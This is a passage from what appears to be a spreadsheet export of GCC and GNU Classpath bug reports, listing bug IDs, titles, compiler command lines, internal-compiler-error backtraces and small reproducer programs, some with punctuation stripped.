/u01/var/tmp/gcc_trunk_svn/gcc_20070807/./gcc/xgcc -B/u01/var/tmp/gcc_trunk_svn/gcc_20070807/./gcc/ -B/opt/gcc-4.3/i386-pc-solaris2.11/bin/ -B/opt/gcc-4.3/i386-pc-solaris2.11/lib/ -isystem /opt/gcc-4.3/i386-pc-solaris2.11/include -isystem /opt/gcc-4.3/i386-pc-solaris2.11/sys-include -O2 -O2 -msse2 -march=native -mtune=native -O3  -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -I. -I/u01/var/tmp/gcc_trunk_svn/gcc_20070807/i386-pc-solaris2.11/amd64/libgcc -I/u01/var/tmp/gcc_trunk_svn/gcc/gcc -I/u01/var/tmp/gcc_trunk_svn/gcc/gcc//u01/var/tmp/gcc_trunk_svn/gcc_20070807/i386-pc-solaris2.11/amd64/libgcc -I/u01/var/tmp/gcc_trunk_svn/gcc/gcc/../include -I/u01/var/tmp/gcc_trunk_svn/gcc/gcc/../libcpp/include -I/usr/local/include -I/usr/local/include -I/u01/var/tmp/gcc_trunk_svn/gcc/gcc/../libdecnumber -I/u01/var/tmp/gcc_trunk_svn/gcc/gcc/../libdecnumber/dpd -I../libdecnumber -g -fkeep-inline-functions -m64 -g0 -finhibit-size-directive -fno-inline-functions -fno-exceptions -fno-zero-initialized-in-bss -fno-toplevel-reorder  -fno-omit-frame-pointer -fno-asynchronous-unwind-tables \
          -c /u01/var/tmp/gcc_trunk_svn/gcc/gcc/crtstuff.c -DCRT_BEGIN \
          -o /u01/var/tmp/gcc_trunk_svn/gcc_20070807/i386-pc-solaris2.11/amd64/libgcc/crtbegin.o
/var/tmp//ccjpaqV3.s: Assembler messages:
/var/tmp//ccjpaqV3.s:91: Error: suffix or operands invalid for `pop'
/var/tmp//ccjpaqV3.s:92: Error: Incorrect register `%rdx' used with `l' suffix
gmake[6]: *** [/u01/var/tmp/gcc_trunk_svn/gcc_20070807/i386-pc-solaris2.11/amd64/libgcc/crtbegin.o] Error 1
This is from my nightly build of trunk with no config changes on the server.  Let me know if you need more information to debug.
Brett Albertson</t>
  </si>
  <si>
    <t>GCC-68198</t>
  </si>
  <si>
    <t>[6 Regression]Excessive code size compile time and memory usage bloat due to FSM threading in 453.povray</t>
  </si>
  <si>
    <t>Created attachment 36642
-fmem-report output
I see a large compile-time regression building 453.povray from SPEC2006 on arm and aarch64.
The file in question is fnpovfpu.cpp.
Try compiling it with:
arm-none-linux-gnueabihf-g++ -DSPEC_CPU -DNDEBUG    -Ofast -mcpu=cortex-a57 -mfpu=neon-vfpv4 -mfloat-abi=hard -mthumb -fno-strict-aliasing -w fnpovfpu.cpp
A gcc from around end of Sep 23rd takes about 1.4s to compile the file on my machine.
Recent gcc at r229696 takes about 6 and a half minutes and consumes a peak of 9.1GB of memory on an x86_64 host.
I'm attaching the -fmem-report I get.
The offending function pov::POVFPU_RunDefault is a large switch statement inside a while (true) so I'm suspecting the FSM threading code.
The resulting assembly code on arm is so large that it doesn't assemble with many branch offset out of range errors.
I'm seeing a similar time and space explosion on aarch64.
Jeff could you please take a look?</t>
  </si>
  <si>
    <t>GCC-70286</t>
  </si>
  <si>
    <t>[5 Regression] ICE on template specialization</t>
  </si>
  <si>
    <t>When the following code:
templatestruct A B
templatestruct B:
is run with g++ 5.3.0 with the argument --std=c++14 the following is produced:
a.cpp:2:18: internal compiler error: Segmentation fault
 templatestruct B:
                  ^
0xacecef crash_signal
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/toplev.c:383
0x66180e maybe_process_partial_specialization(tree_node*)
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/pt.c:834
0x696177 cp_parser_class_head
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:20428
0x696177 cp_parser_class_specifier_1
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:19816
0x696177 cp_parser_class_specifier
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:20108
0x696177 cp_parser_type_specifier
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:14727
0x6a9a87 cp_parser_decl_specifier_seq
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:11958
0x6ae998 cp_parser_single_declaration
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:23776
0x6af33d cp_parser_explicit_specialization
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:14623
0x691bbf cp_parser_declaration
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:11332
0x6b87ea cp_parser_declaration_seq_opt
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:11265
0x6b8aff cp_parser_translation_unit
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:4100
0x6b8aff c_parse_file()
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:33229
0x76bb92 c_common_parse_file()
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/c-family/c-opts.c:1057
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
A similar report is produced if the compiler is given the flag --std=c++11:
a.cpp:1:23: warning: variable templates only available with -std=c++14 or -std=gnu++14
 templatestruct A B
                       ^
a.cpp:2:18: internal compiler error: Segmentation fault
 templatestruct B:
                  ^
0xacecef crash_signal
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/toplev.c:383
0x66180e maybe_process_partial_specialization(tree_node*)
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/pt.c:834
0x696177 cp_parser_class_head
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:20428
0x696177 cp_parser_class_specifier_1
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:19816
0x696177 cp_parser_class_specifier
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:20108
0x696177 cp_parser_type_specifier
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:14727
0x6a9a87 cp_parser_decl_specifier_seq
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:11958
0x6ae998 cp_parser_single_declaration
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:23776
0x6af33d cp_parser_explicit_specialization
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:14623
0x691bbf cp_parser_declaration
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:11332
0x6b87ea cp_parser_declaration_seq_opt
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:11265
0x6b8aff cp_parser_translation_unit
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:4100
0x6b8aff c_parse_file()
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/cp/parser.c:33229
0x76bb92 c_common_parse_file()
        /disk/0/erippey/gcc/objdir/../gcc-5.3.0/gcc/c-family/c-opts.c:1057
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Running gcc 4.8.5 with --std=c++11 does not produce an ICE.</t>
  </si>
  <si>
    <t>GCC-25005</t>
  </si>
  <si>
    <t>[4.1/4.2 regression] ICE in extract_constrain_insn_cached at recog.c:2002</t>
  </si>
  <si>
    <t>With the code I'm going to attach in a second I get this:
deal.II/deal.II&gt; c++ -c -O3 -funroll-loops grid_generator.ii 
grid_generator.ii:6838: warning: '__malloc__' attribute ignored
grid_generator.ii: In static member function 'static void GridGenerator::hyper_ball(Triangulation&amp; const Point&amp; double)':
grid_generator.ii:65800: error: insn does not satisfy its constraints:
(insn 3454 3452 3453 (set (reg:DI 38 r9 [orig:801 D.166645 ] [801])
        (mult:DI (reg:DI 7 sp [626])
            (const_int 2 [0x2]))) 196 {*lea_2_rex64} (nil)
    (nil))
grid_generator.ii:65800: internal compiler error: in extract_constrain_insn_cached at recog.c:2002
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This is with today's svn Revision: 107421.
W.</t>
  </si>
  <si>
    <t>CLASSPATH-24925</t>
  </si>
  <si>
    <t>JTextFields don't respect editable flag</t>
  </si>
  <si>
    <t>setting a JTextField's editable state to FALSE doesn't stop it from accepting and displaying new input.  Pasted below is a testcase.
***TESTCASE***
import java.awt.event.*
import javax.swing.*
import java.awt.*
public class Test
{ 
  public static void main(String[] args)
  {    
    JFrame jf = new JFrame()
    final JTextField text = new JTextField(10)
    final JCheckBox cb = new JCheckBox (toggle editable true)
    cb.addActionListener(new ActionListener() 
      {
        public void actionPerformed(ActionEvent ae) 
        {
          text.setEditable(cb.isSelected())
        }
      })
    jf.add(text BorderLayout.CENTER)
    jf.add(cb BorderLayout.SOUTH)
    jf.pack()
    jf.setVisible(true)
  }
}</t>
  </si>
  <si>
    <t>GCC-15477</t>
  </si>
  <si>
    <t>gfortran should not have own version number</t>
  </si>
  <si>
    <t>gfortran has its own version number which appears in gfortran.texi
and as GFC_VERSION in gfortran.h which however doesn't seem to be
used anywhere.  As a part of GCC not independently released it should
just use the GCC version number.  (Even parts that are independently
released such as the Ada front end now tend to use the GCC version
number when in GCC although other numbers may be used for independent
releases.)
(Of course libgfortran needs its own ABI version number but that is
only used to set the library soname and should only be incremented in
accordance with the libtool rules for setting ABI versions and can
stay at zero until there's been a release to care about compatibility with.)</t>
  </si>
  <si>
    <t>GCC-35119</t>
  </si>
  <si>
    <t>FAIL: g++.dg/template/spec35.C scan-assembler</t>
  </si>
  <si>
    <t>On i686-apple-darwin9 g++.dg/template/spec35.C fails for
FAIL: g++.dg/template/spec35.C scan-assembler .glob(a|)l[\t ]*_Z2f2IfEvT_
FAIL: g++.dg/template/spec35.C scan-assembler .weak[\t ]*_Z2f2IiEvT_
A quick look to the assembly shows that the regular expressions should be something like .glob(a|)l[\t ]*_?_Z2f2IfEvT_ and .weak(_definition)?[\t ]*__Z2f2IiEvT_.
If needed I can do the change in the test and regtest it on Darwin9 (ppc/intel).</t>
  </si>
  <si>
    <t>GCC-2546</t>
  </si>
  <si>
    <t>gcc crashes when compiling itself</t>
  </si>
  <si>
    <t xml:space="preserve">	When compiling gcc it crashes while compiling libstdc++'s string-inst.cc
Release:
3.0 20010413 (prerelease)
Environment:
System: Linux itanic 2.4.2 #1 SMP Mon Apr 2 17:41:19 EDT 2001 ia64 unknown
Architecture: ia64
host: ia64-unknown-linux-gnu
build: ia64-unknown-linux-gnu
target: ia64-unknown-linux-gnu
How-To-Repeat:
../../../../gcc/libstdc++-v3/include/bits/basic_string.tcc: In copy constructor    `std::basic_string::basic_string(const 
   std::basic_string&amp;) [with _CharT = char _Traits = 
   std::char_traits _Alloc = std::allocator]':
../../../../gcc/libstdc++-v3/include/bits/basic_string.tcc:187:   instantiated from `std::basic_string::basic_string(const std::basic_string&amp;) [with _CharT = char _Traits = std::char_traits _Alloc = std::allocator]'
../../../../gcc/libstdc++-v3/src/string-inst.cc:48:   instantiated from here
../../../../gcc/libstdc++-v3/include/bits/basic_string.tcc:187: Internal 
   compiler error in add_abstract_origin_attribute at dwarf2out.c:9247
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>jes</t>
  </si>
  <si>
    <t>GCC-53880</t>
  </si>
  <si>
    <t>[4.8 Regression] compile time regression when generating precompiled headers for boost</t>
  </si>
  <si>
    <t>There is a huge compile time regression in 4.8 when one generates 
a precompiled header for boost's /math/special_functions.hpp.
gcc-4.7:
 % time c++ -c -o pch.hpp.gch /usr/include/boost/math/special_functions.hpp
c++ -c -o pch.hpp.gch /usr/include/boost/math/special_functions.hpp  2.26s user 0.13s system 99% cpu 2.407 total
gcc-4.8:
 % time c++ -c -o pch.hpp.gch /usr/include/boost/math/special_functions.hpp
c++ -c -o pch.hpp.gch /usr/include/boost/math/special_functions.hpp  172.42s user 0.37s system 99% cpu 2:53.44 total</t>
  </si>
  <si>
    <t>GCC-6011</t>
  </si>
  <si>
    <t>compile error with overloaded methods</t>
  </si>
  <si>
    <t>I've encountered the following problem. When using overloaded methods (int and void * parameters) and overriding either of them in a descendant class the other will be inaccessible. The attachment contains a one-page example. According to my c++ knowledge this code should work. Excuse me if it is corrected in 3.0.4.
Release:
2.95.4 3.0.2 still
Environment:
Debian-i386
How-To-Repeat:
Try compiling it :-)</t>
  </si>
  <si>
    <t>ply</t>
  </si>
  <si>
    <t>GCC-68327</t>
  </si>
  <si>
    <t>[6 Regression] ICE on valid code at -O3 on x86_64-linux-gnu in vect_is_simple_use at tree-vect-stmts.c:8562</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -O3 on x86_64-linux-gnu in both 32-bit and 64-bit modes.
It is a regression from 5.2.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20151112 (experimental) [trunk revision 230270] (GCC) 
$ 
$ gcc-trunk -O2 -c small.c
$ gcc-5.2 -O3 -c small.c
$ 
$ gcc-trunk -O3 -c small.c
small.c: In function â€˜fn1â€™:
small.c:5:1: internal compiler error: in vect_is_simple_use at tree-vect-stmts.c:8562
 fn1 ()
 ^
0xd1c930 vect_is_simple_use(tree_node* vec_info* gimple** vect_def_type* tree_node**)
	../../gcc-trunk/gcc/tree-vect-stmts.c:8562
0x5a6d70 vect_determine_vectorization_factor
	../../gcc-trunk/gcc/tree-vect-loop.c:612
0xd3f78d vect_analyze_loop_2
	../../gcc-trunk/gcc/tree-vect-loop.c:1843
0xd3f78d vect_analyze_loop(loop*)
	../../gcc-trunk/gcc/tree-vect-loop.c:2121
0xd5499f vectorize_loops()
	../../gcc-trunk/gcc/tree-vectorizer.c:517
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
----------------------------
int a d
char b c
void
fn1 ()
{
  int i = 0
  for ( i &lt; 1 i++)
    d = 1
  for ( b b++) 
    a = 1 
}</t>
  </si>
  <si>
    <t>GCC-23486</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in execute_todo at passes.c:677</t>
  </si>
  <si>
    <t>// compile with -O3
struct v { int n }
foo (struct v *v int *q)
{
  q [v-&gt;n ++] = 0
}
bar (int b void *p int *q)
{
  for ()
    foo (b ? p : 0 q)
}
//----------------------------------------------------------------------------
t2.c: In function â€˜barâ€™:
t2.c:7: internal compiler error: in execute_todo at passes.c:677</t>
  </si>
  <si>
    <t>GCC-67926</t>
  </si>
  <si>
    <t>Using folding expressions in a constexpr context ice's</t>
  </si>
  <si>
    <t>Trying to compile the following results in an ICE.
$ cat z1.ii
template  concept bool C = (T 
$ /usr/local/gcc-head/bin/g++ --version
g++ (GCC) 6.0.0 20151010 (experimental)
$ /usr/local/gcc-head/bin/g++ -std=c++1z -x c++ z1.ii
z1.ii:1:49: sorry unimplemented: unexpected AST of kind unary_right_fold_expr
 template  concept bool C = (T 
                                                 ^
z1.ii:1:49: internal compiler error: in potential_constant_expression_1 at cp/constexpr.c:4629</t>
  </si>
  <si>
    <t>GCC-11978</t>
  </si>
  <si>
    <t>ada compiler crashes in a-tags.adb</t>
  </si>
  <si>
    <t>gcc -v gives
Reading specs from
/projects/tmp/simondl/gcc3/lib/gcc-lib/i686-pc-linux-gnu/3.3.1/specs
Configured with: ../gcc-3.3.1/configure --enable-languages=cada
--prefix=/projects/tmp/simondl/gcc3
Thread model: posix
gcc version 3.3.1
The bug also can be reproduced on sparc-linux and sparc-solaris. Just compile
the following
package Bang is   
   type T is tagged null record   
   for T'External_Tag use tee
   type S is new T with null record
end Bang</t>
  </si>
  <si>
    <t>GCC-70456</t>
  </si>
  <si>
    <t>GTM::gtm_thread::operator new should properly allocate aligned memory</t>
  </si>
  <si>
    <t>Since GTM::gtm_thread has
gtm_thread *next_thread __attribute__((__aligned__(HW_CACHELINE_SIZE)))
GTM::gtm_thread::operator new should properly allocate aligned memory.</t>
  </si>
  <si>
    <t>GCC-34694</t>
  </si>
  <si>
    <t>[4.3 regression] Wrong line number for uninitialized variable</t>
  </si>
  <si>
    <t>The warning for the following testcase contains a wrong line number
on mainline (compile with -fopenmp -O -Wall):
================================
int i
void foo()
{
#pragma omp parallel
  {
    int j
    i = j
  }
}
================================
bug.c: In function 'foo.omp_fn.0':
bug.c:8: warning: 'j' is used uninitialized in this function
bug.c:8: note: 'j' was declared here
The variable 'j' is in fact declared in line 7 and not 8.
The regression appeared between 2007-08-15 and 2007-09-14.
The bug is triggered with the C and C++ frontend.</t>
  </si>
  <si>
    <t>GCC-9748</t>
  </si>
  <si>
    <t>c++ using operator = ( const Foo&amp; ) when it *should* use operator = ( int )</t>
  </si>
  <si>
    <t>GCC is creating a temporary object and trying to use the
private copy constructor when there are several more appropriate selections.
$ g++ testcase.cpp
testcase.cpp: In function `int main()':
testcase.cpp:28: `Foo::Foo(const Foo&amp;)' is private
testcase.cpp:39: within this context
testcase.cpp:39:   initializing temporary from result of `Foo::Foo(int)'
Release:
gcc version 3.2 (Mandrake Linux 9.0 3.2-1mdk)
How-To-Repeat:
$ g++ testcase.cpp
// testcase.cpp
#include 
class Foo
{
        int _i
public:
        Foo() : _i(0)
        {
        }
        Foo ( int i ) : _i(i)
        {
        }
        const Foo&amp; operator = ( int i )
        {
                _i = i
                return *this
        }
//      operator int() const
//      {
//              return _i
//      }
private:
// disable copy semantics
        Foo ( const Foo&amp; ) { }
        const Foo }
}
int returnsInt()
{
        return 7
}
int main()
{
        Foo foo = returnsInt()
}
// end of testcase.cpp</t>
  </si>
  <si>
    <t>royce3</t>
  </si>
  <si>
    <t>GCC-29134</t>
  </si>
  <si>
    <t>Has there been a serious attempt to define the max_size() member functions?</t>
  </si>
  <si>
    <t>I'm using the special GCC that Apple supplies with
Mac OS X 10.4.7 (PowerPC) and XCode 2.4.  I just ran
a test case with code like:
std::deque  d
assert( d.max_size() &lt;= d.get_allocator().max_size() )
And it failed.  I looked at the definition of deque::max_size
and saw that it blindly return size_type(-1).  This is actually
greater than what the allocator itself returns (hence the
error).  Then I looked again and saw that std::allocator does
the same thing except that it divides the max value by
sizeof(value_type).
Is there a legitimate reason for a deque to return a larger
max_size than its allocator?  Even if so did you guys consider
that or did you just blindly put in the maximum value?  Does
the max_size for the standard allocator have the same issues?
Can there be some thought put into what std::allocator::max_size()
should return?  Maybe it can be based on how much memory the
program can actually access.  Even if you don't do that all the standard
container types/tempates should base their max_size() method on
their this-&gt;get_allocator().max_size() return value.</t>
  </si>
  <si>
    <t>dwalker07</t>
  </si>
  <si>
    <t>GCC-5060</t>
  </si>
  <si>
    <t>Comparisons between double on gcc 2.96</t>
  </si>
  <si>
    <t>Suspicious comparisons between double in following sample.
Release:
2.96
Environment:
Linux  2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown
How-To-Repeat:
Compile and run to see HELP warnings.</t>
  </si>
  <si>
    <t>chailan</t>
  </si>
  <si>
    <t>CLASSPATH-22926</t>
  </si>
  <si>
    <t>build fails on sparc-sun-solaris2.9 - FIONREAD not available</t>
  </si>
  <si>
    <t>Building classpath on sparc-sun-solaris2.9 configured with --disable-gtk-peer fails with this error:
gcc -DHAVE_CONFIG_H -I. -I../../../../classpath-0.14+cvs/native/jni/java-net -I../../../include -I../../../../classpath-0.14+cvs/include -I../../../../classpath-0.14+cvs/native/jni/classpath -I../../../../classpath-0.14+cvs/native/target/Linux -I../../../../classpath-0.14+cvs/native/target/generic -pedantic -W -Wall -Wmissing-declarations -Wwrite-strings -Wmissing-prototypes -Wno-long-long -Wstrict-prototypes -g -O2 -MT gnu_java_net_PlainSocketImpl.lo -MD -MP -MF .deps/gnu_java_net_PlainSocketImpl.Tpo -c ../../../../classpath-0.14+cvs/native/jni/java-net/gnu_java_net_PlainSocketImpl.c  -fPIC -DPIC -o .libs/gnu_java_net_PlainSocketImpl.o
 ../../../../classpath-0.14+cvs/native/jni/java-net/gnu_java_net_PlainSocketImpl.c: In function `Java_gnu_java_net_PlainSocketImpl_available':
../../../../classpath-0.14+cvs/native/jni/java-net/gnu_java_net_PlainSocketImpl.c:208: error: `FIONREAD' undeclared (first use in this function)
../../../../classpath-0.14+cvs/native/jni/java-net/gnu_java_net_PlainSocketImpl.c:208: error: (Each undeclared identifier is reported only once
../../../../classpath-0.14+cvs/native/jni/java-net/gnu_java_net_PlainSocketImpl.c:208: error: for each function it appears in.)
gmake[3]: *** [gnu_java_net_PlainSocketImpl.lo] Error 1
gmake[3]: Leaving directory `/home/bude2/rschuste/cp-obj/native/jni/java-net'
The problem leads to the TARGET_NATIVE_NETWORK_SOCKET_RECEIVE_AVAILABLE macro defined in native/target/generic/target_generic_network.h .
It is supposed that a working implementation can be found in libgcj's does in natPlainSocketImpl.cc (or some similar file).</t>
  </si>
  <si>
    <t>GCC-39496</t>
  </si>
  <si>
    <t>[4.3 Regression] GCC uses non-standard calling conventions for static functions with -O0.</t>
  </si>
  <si>
    <t>Even when compiling with -O0 GCC uses non-standard parameter passing conventions for static inline functions which makes debugging difficult.
In this case the function of interest converts a tagged value to a pointer it's very helpful to be able to use this in GDB 'print' commands.
In the assembly code shown notice that the function is expecting to find its argument in %eax even though the standard IA-32 calling conventions pass the first argument on the stack.  The GDB session also demonstrates this.
$ (cd ~/gcc/gcc svn info)
Path: .
URL: svn://gcc.gnu.org/svn/gcc/trunk
Repository Root: svn://gcc.gnu.org/svn/gcc
Repository UUID: 138bc75d-0d04-0410-961f-82ee72b054a4
Revision: 144927
Node Kind: directory
Schedule: normal
Last Changed Author: gccadmin
Last Changed Rev: 144927
Last Changed Date: 2009-03-17 17:16:40 -0700 (Tue 17 Mar 2009)
$ cat jsobj.i
extern C
{
  static inline struct JSObject *JSVAL_TO_OBJECT (int v)
  {
    return (struct JSObject *) (v 
  }
}
static int
obj_toSource (int *vp)
{
  JSVAL_TO_OBJECT (vp[0])
}
int
main(int argc char **argv)
{
}
$ c++ -v -O0 -g jsobj.i -o jsobj -save-temps
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc/configure --prefix=/home/jimb/gcc --enable-languages=cc++
Thread model: posix
gcc version 4.4.0 20090318 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-v' '-O0' '-g' '-o' 'jsobj' '-save-temps' '-shared-libgcc' '-mtune=generic'
 /home/jimb/gcc/libexec/gcc/i686-pc-linux-gnu/4.4.0/cc1plus -fpreprocessed jsobj.i -quiet -dumpbase jsobj.i -mtune=generic -auxbase jsobj -g -O0 -version -o jsobj.s
GNU C++ (GCC) version 4.4.0 20090318 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 4.4.0 20090318 (experimental) GMP version 4.2.2 MPFR version 2.3.2.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 00b593c3c99bbacc875575ff2b6655cc
COLLECT_GCC_OPTIONS='-v' '-O0' '-g' '-o' 'jsobj' '-save-temps' '-shared-libgcc' '-mtune=generic'
 as -V -Qy -o jsobj.o jsobj.s
GNU assembler version 2.18.93 (i486-linux-gnu) using BFD version (GNU Binutils for Ubuntu) 2.18.93.20081009
COMPILER_PATH=/home/jimb/gcc/libexec/gcc/i686-pc-linux-gnu/4.4.0/:/home/jimb/gcc/libexec/gcc/i686-pc-linux-gnu/4.4.0/:/home/jimb/gcc/libexec/gcc/i686-pc-linux-gnu/:/home/jimb/gcc/lib/gcc/i686-pc-linux-gnu/4.4.0/:/home/jimb/gcc/lib/gcc/i686-pc-linux-gnu/
LIBRARY_PATH=/home/jimb/gcc/lib/gcc/i686-pc-linux-gnu/4.4.0/:/home/jimb/gcc/lib/gcc/i686-pc-linux-gnu/4.4.0/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-v' '-O0' '-g' '-o' 'jsobj' '-save-temps' '-shared-libgcc' '-mtune=generic'
 /home/jimb/gcc/libexec/gcc/i686-pc-linux-gnu/4.4.0/collect2 --eh-frame-hdr -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o jsobj /usr/lib/crt1.o /usr/lib/crti.o /home/jimb/gcc/lib/gcc/i686-pc-linux-gnu/4.4.0/crtbegin.o -L/home/jimb/gcc/lib/gcc/i686-pc-linux-gnu/4.4.0 -L/home/jimb/gcc/lib/gcc/i686-pc-linux-gnu/4.4.0/../../.. jsobj.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /home/jimb/gcc/lib/gcc/i686-pc-linux-gnu/4.4.0/crtend.o /usr/lib/crtn.o
$ cat jsobj.s
...
JSVAL_TO_OBJECT:
.LFB0:
	.file 1 jsobj.i
	.loc 1 4 0
	.cfi_startproc
	.cfi_personality 0x0__gxx_personality_v0
	pushl	%ebp
	.cfi_def_cfa_offset 8
	movl	%esp %ebp
	.cfi_offset 5 -8
	.cfi_def_cfa_register 5
	subl	$4 %esp
	movl	%eax -4(%ebp)
	.loc 1 5 0
	movl	-4(%ebp) %eax
	andl	$-4 %eax
	.loc 1 6 0
	leave
	ret
...
$ gdb jsobj
GNU gdb (GDB) 6.8.50.20090106-cvs
Copyright (C) 2009 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as i686-pc-linux-gnu.
For bug reporting instructions please see:
...
(gdb) start
Temporary breakpoint 1 at 0x804844c: file jsobj.i line 16.
Starting program: /home/jimb/mc/b/static-call/jsobj 
Temporary breakpoint 1 main (argc=1 argv=0xbffff8a4) at jsobj.i:16
16	}
Current language:  auto currently c++
(gdb) set $eax = 0x42424242
(gdb) print JSVAL_TO_OBJECT(0x53535353)
$1 = (struct JSObject *) 0x42424240
(gdb) quit
The program is running.  Quit anyway (and kill it)? (y or n) y
$</t>
  </si>
  <si>
    <t>jimb</t>
  </si>
  <si>
    <t>GCC-27150</t>
  </si>
  <si>
    <t>[4.2 Regression] ICE with &amp;parm_decl != 0 in build_binary_op</t>
  </si>
  <si>
    <t>Testcase:
int g(int f)
{
  return (
}
-----
Just like PR 25861.
t.c:5: internal compiler error: tree check: expected tree that contains decl with visibility structure have parm_decl  in build_binary_op at c-typeck.c:7987
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-25147</t>
  </si>
  <si>
    <t>passing variable in place of function dummy argument not caught</t>
  </si>
  <si>
    <t>schluter@pcl247d:~/src/work&gt; cat testint.f90
module integrator
  interface
     function integrate(fxminxmax)
       implicit none
       interface
          function f(x)
            real*8 :: fx
            intent(in) :: x
          end function f
       end interface
       real*8 :: xmin xmax integrate
     end function integrate
  end interface
end module integrator
use integrator
real*8 :: f
print *integrate (f0d03d0)
end
schluter@pcl247d:~/src/work&gt; ~/src/gcc/build/gcc/f951 testint.f90 -quiet
schluter@pcl247d:~/src/work&gt; pgf90 testint.f90
PGF90-S-0447-Argument number 1 to integrate must be a subroutine or function nam
e (testint.f90: 20)
  0 inform   0 warnings   1 severes 0 fatal for MAIN
schluter@pcl247d:~/src/work&gt; 
I'd expect an error message similar to pgf90's.</t>
  </si>
  <si>
    <t>GCC-72851</t>
  </si>
  <si>
    <t>[6 Regression] memory hog with -O3 on s390x-linux-gnu</t>
  </si>
  <si>
    <t>Created attachment 39087
preprocessed source
seen with the gcc-6-branch and trunk 20160804
gcc -g -O3 -std=c99 -fPIC -pthread -c des.i
allocates all available memory and then is killed. Workaround is to build with -O2.</t>
  </si>
  <si>
    <t>GCC-55633</t>
  </si>
  <si>
    <t>[4.8 Regression] FAIL: gfortran.dg/g77/f90-intrinsic-bit.f  -Os  execution test</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/testsuite/gfortran/../../gfortran -B/test/gnu/gcc/objdir/gcc/testsuite/gfortran/../../ -B/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgfortran/ /test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/g77/f90-intrinsic-bit.f  -fno-diagnostics-show-caret   -Os   -pedantic-errors  -B/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgfortran/.libs -L/test/gnu/gcc/objdi
r/hppa2.0w-hp-hpux11.11/./libgfortran/.libs -L/test/gnu/gcc/objdir/hppa2.0w-hp-h
pux11.11/./libgfortran/.libs -B/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libq
uadmath/.libs -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs -
L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs  -lm   -o ./f90-
intrinsic-bit.exe    (timeout = 300)
spawn /test/gnu/gcc/objdir/gcc/testsuite/gfortran/../../gfortran -B/test/gnu/gcc
/objdir/gcc/testsuite/gfortran/../../ -B/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.
